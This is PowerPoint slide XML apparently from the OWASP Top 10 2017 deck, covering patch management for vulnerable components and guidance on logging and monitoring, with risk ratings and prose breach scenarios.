              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">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There should be a patch management process in place to:</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Remove unused dependencies, unnecessary features, components, files, and documentation.</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Continuously inventory the versions of both client-side and server-side components (e.g. frameworks, libraries) and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>versions</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hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc. Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for vulnerabilities in the components. Use software composition analysis tools to automate the process. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subscribe to email alerts for security vulnerabilities related to components you use.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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Only obtain components from official sources over secure links. Prefer signed packages to reduce the chance of including a modified, malicious component.</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Monitor for libraries and components that are unmaintained or do not create security patches for older versions. If patching is not possible, consider deploying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to monitor, detect, or protect against the discovered issue.</a:t>
            </a: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Every organization must ensure that there is an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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A9</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Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948689633"/>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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de" sz="120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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.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Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Some scanners such as retire.js help in detection, but determining exploitability requires additional effort.</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>be at the top of the list.</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788797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An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</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An attacker uses scans for users using a common password. They can take over all accounts using this password. For all other users, this scan leaves only one false login behind. After some days, this may be repeated with a different password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Insufficient logging, detection, monitoring and active response occurs any time:</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Auditable events, such as logins, failed logins, and high-value transactions are not logged.</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Warnings and errors generate no, inadequate, or unclear log messages.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Logs of applications and APIs are not monitored for suspicious activity.</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Logs are only stored locally.</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Appropriate alerting thresholds and response escalation processes are not in place or effective.</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Penetration testing and scans by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) do not trigger alerts.</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application is unable to detect, escalate, or alert for active attacks in real time or near real time.</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You are vulnerable to information leakage if you make logging and alerting events visible to a user or an attacker (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Information Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</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Proactive Controls: Implement Logging and Intrusion Detection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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V8 Logging and Monitoring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Testing Guide: Testing for Detailed Error Code</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Cheat Sheet: Logging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CWE-223: Omission of Security-relevant Information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CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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As per the risk of the data stored or processed by the application:</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Ensure all login, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin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rPr>
              <a:t>Ensure that logs are generated in a format that can be easily consumed by a centralized log management solutions.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rPr>
              <a:t>Ensure high-value transactions have an audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trail with integrity controls to prevent tampering or deletion, such as append-only database tables or similar.</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Establish effective monitoring and alerting such that suspicious activities are detected and responded to in a timely fashion.</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Establish or adopt an incident response and recovery plan, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are commercial and open source application protection frameworks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> with the OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and log correlation software with custom dashboards and alerting. </a:t>
            </a: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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1897871955"/>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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de" sz="100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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de" sz="120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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de" sz="100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1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>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en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de" sz="120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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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n>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This issue is included in the Top 10 based on an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
